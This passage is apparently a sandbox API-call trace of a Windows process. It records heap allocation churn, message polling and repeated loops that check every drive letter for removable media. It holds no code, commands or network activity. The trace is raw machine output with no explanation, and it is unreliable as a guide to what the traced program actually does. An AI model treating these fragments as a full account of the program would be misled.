Size=0x40) returned 0x1318b10 [0213.638] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.638] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.638] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.639] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.639] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.639] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.639] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.639] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.639] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.639] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.639] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.640] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.640] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.640] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.640] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.640] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.640] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.641] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.641] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.641] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.641] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.641] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.641] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.641] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.642] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.642] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.642] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.642] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.643] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0213.643] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0213.643] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0213.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.644] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.644] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.644] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.644] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0213.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.644] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.644] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.645] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.645] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.645] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.645] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.645] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.645] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.645] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.645] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.646] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.646] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.646] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.646] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.646] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.700] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.700] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.701] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.701] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.701] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.701] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.702] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.702] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.702] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.702] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.702] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.703] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0213.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0213.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.703] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0213.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0213.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0213.704] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0213.704] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.704] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.704] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0213.705] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0213.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0213.705] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.705] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.705] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.705] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.705] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.706] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.706] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.706] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.706] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.706] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.706] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.707] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.707] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.707] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.707] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.707] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.708] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.708] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.708] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.708] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.708] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.709] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.709] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.709] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.709] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.710] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.710] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.711] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0213.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0213.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0213.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0213.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0213.712] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.713] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.713] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.713] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: 